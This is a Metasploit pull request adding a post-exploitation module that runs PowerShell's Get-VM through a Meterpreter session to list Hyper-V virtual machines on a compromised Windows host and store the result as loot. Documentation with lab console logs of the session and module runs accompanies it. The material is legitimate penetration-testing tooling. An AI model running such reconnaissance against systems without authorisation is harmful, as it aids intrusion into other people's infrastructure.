### PR TITLE
Hyper-V VM Enumeration Module

### DIFF
--- a/documentation/modules/post/windows/gather/enum_hyperv_vms.md
+++ b/documentation/modules/post/windows/gather/enum_hyperv_vms.md
@@ -1,0 +1,136 @@
+## Vulnerable Application
+
+  This post-exploitation module will check if a host is running Hyper-V. If the host is running Hyper-V, the module
+  will gather information about all Hyper-V VMs installed on the host, including the name of the VM, its status,
+  CPU usage, version of the Hyper-V engine that it relies on, and its state (running, suspended, offline, etc).
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use post/windows/gather/enum_hyperv_vms`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see a list of Hyper-V VMs that currently exist on the target host if Hyper-V is installed, along with information about their attributes.
+
+## Options
+
+  - **SESSION** - The session to run the module on.
+
+## Extracted data
+
+  - Name of each VM
+  - State of each VM
+  - CPU Usage of each VM
+  - How long each VM has been running for, down to the milliseconds.
+  - Amount of memory assigned to each VM
+  - Status of each VM
+  - The version of the Hyper-V engine that each VM is using.
+
+## Scenarios
+
+### Meterpreter session as normal user on a Windows Server 2019 Standard Edition host running several VMs - fails as user lacks required permissions
+
+```
+msf6 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.20.150.24:4444
+[*] Sending stage (200262 bytes) to 172.20.150.24
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.20.150.24:4444) at 2020-09-10 18:33:16 -0500
+
+meterpreter > whoami
+[-] Unknown command: whoami.
+meterpreter > getuid
+Server username: RAPID7\normal
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeMachineAccountPrivilege
+
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use post/windows/gather/enum_hyperv_vms 
+msf6 post(windows/gather/enum_hyperv_vms) > show options
+
+Module options (post/windows/gather/enum_hyperv_vms):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SESSION                   yes       The session to run this module on.
+
+msf6 post(windows/gather/enum_hyperv_vms) > set session 1
+session => 1
+msf6 post(windows/gather/enum_hyperv_vms) > run
+
+[+] Compressed size: 800
+[-] You need to be running as an elevated admin or a user of the Hyper-V Administrators group to run this module
+[*] Post module execution completed
+msf6 post(windows/gather/enum_hyperv_vms) > 
+```
+
+### Meterpreter session as an elevated admin user
+```
+msf6 exploit(multi/handler) > exploit
+
+[*] Started bind TCP handler against 172.20.150.24:4444
+[*] Sending stage (200262 bytes) to 172.20.150.24
+[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.20.150.24:4444) at 2020-09-10 18:43:15 -0500
+
+meterpreter > getuid
+Server username: RAPID7\Administrator
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeBackupPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeCreatePagefilePrivilege
+SeCreateSymbolicLinkPrivilege
+SeDebugPrivilege
+SeEnableDelegationPrivilege
+SeImpersonatePrivilege
+SeIncreaseBasePriorityPrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+SeLoadDriverPrivilege
+SeMachineAccountPrivilege
+SeManageVolumePrivilege
+SeProfileSingleProcessPrivilege
+SeRemoteShutdownPrivilege
+SeRestorePrivilege
+SeSecurityPrivilege
+SeShutdownPrivilege
+SeSystemEnvironmentPrivilege
+SeSystemProfilePrivilege
+SeSystemtimePrivilege
+SeTakeOwnershipPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > background
+[*] Backgrounding session 2...
+msf6 exploit(multi/handler) > use post/windows/gather/enum_hyperv_vms 
+msf6 post(windows/gather/enum_hyperv_vms) > set SESSION 2 
+SESSION => 2
+msf6 post(windows/gather/enum_hyperv_vms) > run
+
+[+] Compressed size: 800
+[*] Name           State   CPUUsage(%) MemoryAssigned(M) Uptime           Status             Version
+----           -----   ----------- ----------------- ------           ------             -------
+Test Machine   Off     0           0                 00:00:00         Operating normally 9.0    
+Windows XP SP3 Running 79          2048              02:54:58.3210000 Operating normally 9.0    
+
+[+] Stored loot at /home/gwillcox/.msf4/loot/20200910184541_default_172.20.150.24_host.hyperv_vms_309544.txt
+[*] Post module execution completed
+msf6 post(windows/gather/enum_hyperv_vms) > 
+```

--- a/documentation/modules/post/windows/gather/enum_hyperv_vms.md
+++ b/documentation/modules/post/windows/gather/enum_hyperv_vms.md
@@ -11,7 +11,7 @@
   3. Do: `use post/windows/gather/enum_hyperv_vms`
   4. Do: `set SESSION <session id>`
   5. Do: `run`
-  6. You should be able to see a list of Hyper-V VMs that currently exist on the target host if Hyper-V is installed, along with information about their attributes.
+  6. If the host has Hyper-V installed, a list of Hyper-V VMs which are on target host will be returned, along with their attributes.
 
 ## Options
 
@@ -29,7 +29,7 @@
 
 ## Scenarios
 
-### Meterpreter session as normal user on a Windows Server 2019 Standard Edition host running several VMs - fails as user lacks required permissions
+### Meterpreter session as a normal user on Windows Server 2019 Standard Edition - fails as user lacks required permissions
 
 ```
 msf6 exploit(multi/handler) > exploit

--- a/documentation/modules/post/windows/gather/enum_hyperv_vms.md
+++ b/documentation/modules/post/windows/gather/enum_hyperv_vms.md
@@ -15,7 +15,7 @@
 
 ## Options
 
-  - **SESSION** - The session to run the module on.
+This module just uses the standard options available to any post module.
 
 ## Extracted data
 
@@ -38,8 +38,6 @@ msf6 exploit(multi/handler) > exploit
 [*] Sending stage (200262 bytes) to 172.20.150.24
 [*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.20.150.24:4444) at 2020-09-10 18:33:16 -0500
 
-meterpreter > whoami
-[-] Unknown command: whoami.
 meterpreter > getuid
 Server username: RAPID7\normal
 meterpreter > getprivs

--- a/modules/post/windows/gather/enum_hyperv_vms.rb
+++ b/modules/post/windows/gather/enum_hyperv_vms.rb
@@ -4,45 +4,47 @@
 ##
 
 class MetasploitModule < Msf::Post
-    include Msf::Post::Windows::Powershell
-  
-    def initialize(info={})
-      super(update_info(info,
-        'Name'                 => "Windows Hyper-V VM Enumeration",
-        'Description'          => %q{
-          This module will check if the target machine is a Hyper-V host and, if it is, will return a list of all 
+  include Msf::Post::Windows::Powershell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Hyper-V VM Enumeration',
+        'Description' => %q{
+          This module will check if the target machine is a Hyper-V host and, if it is, will return a list of all
           of the VMs running on the host, as well as stats such as their state, version, CPU Usage, uptime, and status.
         },
-        'License'              => MSF_LICENSE,
-        'Platform'             => ['win'],
-        'SessionTypes'         => ['meterpreter'],
-        'Author'               =>
+        'License' => MSF_LICENSE,
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Author' =>
           [
             'gwillcox-r7' # Metasploit post module
           ]
-      ))
-    end
-  
-    def run
-        unless have_powershell?()
-            fail_with(Failure::NoAccess, "The target does not have PowerShell installed so we can't access the state of the Hyper-V VMs")
-        end
-        results = psh_exec("Get-VM")
-        if results =~ /is not recognized as the name of a cmdlet/
-            print_error("The target is not a Hyper-V host")
-        elsif results =~ /do not have the required permission/
-            print_error("You need to be running as an elevated admin or a user of the Hyper-V Administrators group to run this module")
-            return
-        end
-        vprint_status(results)
-        filtered_result = results.match(/^Name(.+\r\n){1,2000}/) # If your running more than 2000 VMs on a single host, you have my sincerest sympathy.
-        if filtered_result.nil?
-            print_error("Sorry, no results were found! Perhaps the target has Hyper-V installed but doesn't have any VMs set up?")
-            return
-        end
-        print_status(filtered_result.to_s)
-        loot_location = store_loot('host.hyperv_vms', 'text/plain', session, filtered_result.to_s, "#{session.session_host}.hyperv_vm_information.txt", "#{session.session_host} Hyper-V VM Information")
-        print_good("Stored loot at #{loot_location}")
-    end
+      )
+      )
   end
-  
+
+  def run
+    unless have_powershell?
+      fail_with(Failure::NoAccess, "The target does not have PowerShell installed so we can't access the state of the Hyper-V VMs")
+    end
+    results = psh_exec('Get-VM')
+    if results =~ /is not recognized as the name of a cmdlet/
+      print_error('The target is not a Hyper-V host')
+    elsif results =~ /do not have the required permission/
+      print_error('You need to be running as an elevated admin or a user of the Hyper-V Administrators group to run this module')
+      return
+    end
+    vprint_status(results)
+    filtered_result = results.match(/^Name(.+\r\n){1,2000}/) # If your running more than 2000 VMs on a single host, you have my sincerest sympathy.
+    if filtered_result.nil?
+      print_error("Sorry, no results were found! Perhaps the target has Hyper-V installed but doesn't have any VMs set up?")
+      return
+    end
+    print_status(filtered_result.to_s)
+    loot_location = store_loot('host.hyperv_vms', 'text/plain', session, filtered_result.to_s, "#{session.session_host}.hyperv_vm_information.txt", "#{session.session_host} Hyper-V VM Information")
+    print_good("Stored loot at #{loot_location}")
+  end
+end

--- a/modules/post/windows/gather/enum_hyperv_vms.rb
+++ b/modules/post/windows/gather/enum_hyperv_vms.rb
@@ -1,0 +1,48 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+    include Msf::Post::Windows::Powershell
+  
+    def initialize(info={})
+      super(update_info(info,
+        'Name'                 => "Windows Hyper-V VM Enumeration",
+        'Description'          => %q{
+          This module will check if the target machine is a Hyper-V host and, if it is, will return a list of all 
+          of the VMs running on the host, as well as stats such as their state, version, CPU Usage, uptime, and status.
+        },
+        'License'              => MSF_LICENSE,
+        'Platform'             => ['win'],
+        'SessionTypes'         => ['meterpreter'],
+        'Author'               =>
+          [
+            'gwillcox-r7' # Metasploit post module
+          ]
+      ))
+    end
+  
+    def run
+        unless have_powershell?()
+            fail_with(Failure::NoAccess, "The target does not have PowerShell installed so we can't access the state of the Hyper-V VMs")
+        end
+        results = psh_exec("Get-VM")
+        if results =~ /is not recognized as the name of a cmdlet/
+            print_error("The target is not a Hyper-V host")
+        elsif results =~ /do not have the required permission/
+            print_error("You need to be running as an elevated admin or a user of the Hyper-V Administrators group to run this module")
+            return
+        end
+        vprint_status(results)
+        filtered_result = results.match(/^Name(.+\r\n){1,2000}/) # If your running more than 2000 VMs on a single host, you have my sincerest sympathy.
+        if filtered_result.nil?
+            print_error("Sorry, no results were found! Perhaps the target has Hyper-V installed but doesn't have any VMs set up?")
+            return
+        end
+        print_status(filtered_result.to_s)
+        loot_location = store_loot('host.hyperv_vms', 'text/plain', session, filtered_result.to_s, "#{session.session_host}.hyperv_vm_information.txt", "#{session.session_host} Hyper-V VM Information")
+        print_good("Stored loot at #{loot_location}")
+    end
+  end
+  

--- a/modules/post/windows/gather/enum_hyperv_vms.rb
+++ b/modules/post/windows/gather/enum_hyperv_vms.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Post
       return
     end
     vprint_status(results)
-    filtered_result = results.match(/^Name(.+\r\n){1,2000}/) # If your running more than 2000 VMs on a single host, you have my sincerest sympathy.
+    filtered_result = results.match(/^Name(?:.+\r\n){1,2000}/) # If your running more than 2000 VMs on a single host, you have my sincerest sympathy.
     if filtered_result.nil?
       print_error("Sorry, no results were found! Perhaps the target has Hyper-V installed but doesn't have any VMs set up?")
       return


### PR DESCRIPTION
This PR adds a very simple auxiliary module which will see if a target is a Hyper-V host. If it is, it will attempt to gather information about all Hyper-V VMs that exist on the target using the `Get-VM` PowerShell command, and it will then save these results into the loot for later use.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] Get a Meterpreter shell on a Hyper-V host.
- [ ] `use use post/windows/gather/enum_hyperv_vms`
- [ ] `set SESSION <session ID>`
- [ ] `run`
- [ ] **Verify** that the exploit returns an error if the current user does not have permissions to run the `Get-VM` PowerShell commandlet.
- [ ] **Verify** that if the current user does have permissions to run the `Get-VM`  commandlet, that details about all of the VMs that exist on the target are returned and saved into a loot file.
- [ ] **Document** anything that is not working correctly.
